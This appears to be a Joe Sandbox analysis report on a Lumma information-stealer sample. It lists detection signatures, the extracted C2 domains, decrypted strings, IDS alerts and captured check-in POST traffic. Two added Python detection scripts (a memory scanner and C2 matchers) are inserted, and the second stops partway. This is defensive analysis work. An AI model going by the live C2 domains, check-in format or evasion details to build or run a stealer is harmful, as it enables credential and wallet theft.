Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532904
MD5: e6f6b8cea53e7f4747e424f1617f3393
SHA1: 59c199c720a2e106822defba032c2eb90f9699da
SHA256: 95b1cfb989f22fc872400433acaa047fc01be081433137307523e4d116390598
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E6F6B8CEA53E7F4747E424F1617F3393)
    • WerFault.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Malware configuration (extracted from memory):
{"C2 url": ["dissapoiznw.store", "spirittunek.store", "mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Yara matches:
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security
    No Sigma rule has matched
    Suricata IDS alerts:
    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-10-14T06:52:05.178120+0200  2056471  1         Domain Observed Used for C2 Detected  192.168.2.4  61554        1.1.1.1         53                UDP
    2024-10-14T06:52:05.189242+0200  2056485  1         Domain Observed Used for C2 Detected  192.168.2.4  53766        1.1.1.1         53                UDP
    2024-10-14T06:52:05.200339+0200  2056483  1         Domain Observed Used for C2 Detected  192.168.2.4  63169        1.1.1.1         53                UDP
    2024-10-14T06:52:05.211010+0200  2056481  1         Domain Observed Used for C2 Detected  192.168.2.4  53209        1.1.1.1         53                UDP
    2024-10-14T06:52:05.221679+0200  2056479  1         Domain Observed Used for C2 Detected  192.168.2.4  58628        1.1.1.1         53                UDP
    2024-10-14T06:52:05.233741+0200  2056477  1         Domain Observed Used for C2 Detected  192.168.2.4  58554        1.1.1.1         53                UDP
    2024-10-14T06:52:05.250603+0200  2056475  1         Domain Observed Used for C2 Detected  192.168.2.4  50547        1.1.1.1         53                UDP
    2024-10-14T06:52:05.267741+0200  2056473  1         Domain Observed Used for C2 Detected  192.168.2.4  51153        1.1.1.1         53                UDP
    2024-10-14T06:52:06.634065+0200  2858666  1         Domain Observed Used for C2 Detected  192.168.2.4  49730        104.102.49.254  443               TCP
    2024-10-14T06:52:07.578747+0200  2049836  1         A Network Trojan was detected         192.168.2.4  49731        104.21.53.8     443               TCP
    2024-10-14T06:52:07.578747+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49731        104.21.53.8     443               TCP
    2024-10-14T06:52:08.724141+0200  2049812  1         A Network Trojan was detected         192.168.2.4  49732        104.21.53.8     443               TCP
    2024-10-14T06:52:08.724141+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49732        104.21.53.8     443               TCP

    AV Detection

    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: file.exe.6988.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "spirittunek.store", "mobbipenju.store", "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store", "clearancek.site", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://bathdoomgaz.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://licendfilteo.site:443/apiVirustotal: Detection: 19%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: https://dissapoiznw.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: https://sergei-esenin.com/0Virustotal: Detection: 15%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
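    The strings above were recovered by the sandbox's string decryptor from the process memory dump, not from the file on disk (see the "LummaC encrypted strings found" and "Sample uses string decryption" signatures). The check below, added here as an example and not part of the Joe Sandbox report, turns them into a memory-scan rule and shows why the same rule finds nothing in the on-disk image. The indicator strings are copied from the report; the two buffers and the XOR "encryption" used to build the fake on-disk image are constructed (the report does not describe the sample's real string-encryption scheme).

```python
"""Memory-scan check for the decrypted LummaC strings listed in the report.

Added example, not part of the Joe Sandbox report. DECRYPTED_STRINGS are
copied from the report's "String decryptor" lines; ON_DISK and IN_MEMORY
are CONSTRUCTED buffers used only to exercise scan().
"""

# Strings the sandbox recovered only after the sample decrypted them in memory.
DECRYPTED_STRINGS = [
    b"TeslaBrowser/5.5",
    b"lid=%s&j=%s&ver=4.0",
    b"- Screen Resoluton:",            # sic: the malware's own misspelling, kept verbatim
    b"- Physical Installed Memory:",
    b"Workgroup: -",
    b"4SD0y4--legendaryy",             # build id: specific to this sample, not the family
]

# Family-level strings vs. sample-specific ones are weighted separately so the
# rule is not blind to the next build of the same family.
GENERIC = DECRYPTED_STRINGS[:5]
SAMPLE_SPECIFIC = DECRYPTED_STRINGS[5:]


def scan(buf, min_generic=3):
    """Return (verdict, matched) for a memory buffer.

    verdict is "lummac" when at least `min_generic` family strings are present,
    in either ASCII or UTF-16LE form (Windows code mixes both); otherwise
    "clean". matched lists every indicator found, including sample-specific ones.
    """
    found = []
    for s in GENERIC + SAMPLE_SPECIFIC:
        if s in buf or s.decode().encode("utf-16-le") in buf:
            found.append(s.decode())
    generic_hits = sum(1 for s in GENERIC if s.decode() in found)
    return ("lummac" if generic_hits >= min_generic else "clean"), found


def xor_encrypt(data, key):
    """Toy stand-in for the sample's string encryption (ASSUMPTION: the real
    scheme is not described in the report). Used only to build a fake on-disk
    image in which the plaintext strings are absent."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# CONSTRUCTED buffers: an "on-disk" image with the strings still encrypted,
# and a "process memory" snapshot after the sample has decrypted some of them.
ON_DISK = b"MZ" + b"\x00" * 16 + xor_encrypt(b"".join(DECRYPTED_STRINGS), b"\x5a\xa5\x3c")
IN_MEMORY = (b"\x00" * 8 + b"TeslaBrowser/5.5\x00" + b"lid=%s&j=%s&ver=4.0\x00"
             + "- Screen Resoluton:".encode("utf-16-le") + b"\x00" * 4 + b"Workgroup: -\x00")

if __name__ == "__main__":
    print("on-disk:  ", scan(ON_DISK))
    print("in-memory:", scan(IN_MEMORY))
```

    Run against a real process memory dump (for example the `.sdmp` regions the report cites) rather than the PE on disk; with the threshold at three family strings the on-disk image yields "clean" and the memory snapshot "lummac". The build id is reported when present but never counted toward the verdict, because it changes per build while the check-in format string and the system-info labels do not.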
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0053D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0053D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_005799D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0053FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00540EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00575700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00546F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0054D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00573920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_005349A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00535A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00574A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00541A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00541ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_005442FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00579B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0053A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00543BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00541BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0054D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0055C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0054B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00579CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00579CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00559510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0055FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00546536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00541E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0053BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00546EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00536EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00546F91

    Networking

    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:53209 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:58628 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:63169 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53766 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:61554 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50547 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:58554 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:51153 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical entries)
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sru `Qo equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=7f29bf101b41067af1b6c20b; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 14 Oct 2024 04:52:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
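    The network findings above give two detection handles: the eight C2 domains from the extracted configuration (each of which the sample resolved via 1.1.1.1 and each of which tripped an ET "Lumma Stealer Related CnC Domain in DNS Lookup" rule) and the check-in request itself, a POST to /api with a form-urlencoded body whose decrypted template is lid=%s&j=%s&ver=4.0. The script below, added here as an example and not part of the Joe Sandbox report, turns both into reusable detection logic: a Suricata rule per configured domain, a DNS-name matcher that also catches subdomains, and a matcher for the check-in body. The configuration dict is copied from the report; the local SID range, the sample DNS names and the HTTP request records are constructed and are not the report's captured traffic.

```python
"""Detection logic built from the LummaC indicators in the report above.

Added example, not part of the Joe Sandbox report. LUMMA_CONFIG is copied
from the report's malware configuration extractor output; LOCAL_SID_BASE,
SAMPLE_DNS and SAMPLE_REQUESTS are CONSTRUCTED to exercise the functions.
"""
import re
from urllib.parse import parse_qs

# Extracted configuration (copied verbatim from the report).
LUMMA_CONFIG = {
    "C2 url": ["dissapoiznw.store", "spirittunek.store", "mobbipenju.store",
               "licendfilteo.site", "eaglepawnoy.store", "bathdoomgaz.store",
               "clearancek.site", "studennotediw.store"],
    "Build id": "4SD0y4--legendaryy",
}

# Decrypted check-in format string from the report: "lid=%s&j=%s&ver=4.0".
CHECKIN_BODY_RE = re.compile(r"^lid=[^&]+&j=[^&]*&ver=4\.0$")

# ASSUMPTION: a local SID range for the generated rules. These are not the ET
# SIDs (2056471-2056485, 2049812, 2049836, 2054653) that fired in the sandbox.
LOCAL_SID_BASE = 1_000_000


def is_c2_domain(qname, c2_domains=LUMMA_CONFIG["C2 url"]):
    """True if a DNS query name is one of the C2 domains or a subdomain of one.
    The "." prefix keeps e.g. notclearancek.site from matching clearancek.site."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in c2_domains)


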